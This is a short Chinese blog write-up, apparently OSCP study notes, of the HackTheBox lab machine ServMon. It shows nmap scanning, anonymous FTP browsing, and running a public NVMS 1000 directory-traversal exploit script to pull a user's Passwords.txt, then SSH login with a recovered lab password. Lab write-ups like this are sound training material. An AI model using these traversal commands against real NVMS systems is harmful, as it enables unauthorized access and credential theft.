OSCP备考_0x51_HackThBox靶机_Windows_ServMon

Ethan医生4个月前靶场145

OSCP备考_0x51_HackThBox靶机_Windows_ServMon

10.129.227.77

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.227.77 (扫描TCP)

image.png

image.png

image.png

通过匿名登入ftp


ftp 10.129.227.77  ,发现在Users底下有两个用户

image.png

通过遍历ftp服务,我们发现两个用户nadine和nathan

同时也发现了两个文件

Confidential.txt

'Notes to do.txt'


80端口

image.png



弱口令都没有用

尝试

searchsploit nvms 1000

image.png

目录遍历

python2.7 48311.py 10.129.227.77 users/Nathan/Desktop/Passwords.txt Passwords.txt

没测试成功

使用GOOGLE查询

https://github.com/AleDiBen/NVMS1000-Exploit/tree/master

github下载下里


python nvms.py 10.129.227.77 users/Nathan/Desktop/Passwords.txt Passwords.txt

image.png

爆破发现密码L1k3B1gBut7s@W0rk     


登入ssh nadine@10.129.227.77

标签: OSCP

相关文章

OSCP备考_0x37_HackThBox靶机_ScriptKiddie

OSCP备考_0x37_HackThBox靶机_ScriptKiddie

ScriptKiddienmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.95.150 (扫描TCP)访问5000端口,发现是一个集成工具...

OSCP备考_0x18_HackThBox靶机_Linux_Popcorn

OSCP备考_0x18_HackThBox靶机_Linux_Popcorn

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.70.193 (扫描TCP)nmap -sU --top-ports 100 ...

OSCP备考_0x30_HackThBox靶机_Linux_Doctor

OSCP备考_0x30_HackThBox靶机_Linux_Doctor

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.7.227 (扫描TCP)nmap -sU --top-ports 100 10.129.7.22...

OSCP备考_0x52_HackThBox靶机_Windows_Buff

OSCP备考_0x52_HackThBox靶机_Windows_Buff

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.25.107 (扫描TCP)打开8080然后就是使用EXP然后就获取到SHELL然后EA...

OSCP备考_0x01_HackThBox靶机_Linux_Shocker

OSCP备考_0x01_HackThBox靶机_Linux_Shocker

先连接到外网开放的服务器openvpn xxx.ovpn信息收集nmap -p- 10.129.216.48 (这样扫描太慢了)nmap -sCV -p- --min-rate 10000 -T4 -...

OSCP备考_0x40_HackThBox靶机_Windows_Bastard

OSCP备考_0x40_HackThBox靶机_Windows_Bastard

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.253.131 (扫描TCP)查看到是Drupal 7.54ruby 44449.rb...

发表评论    

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。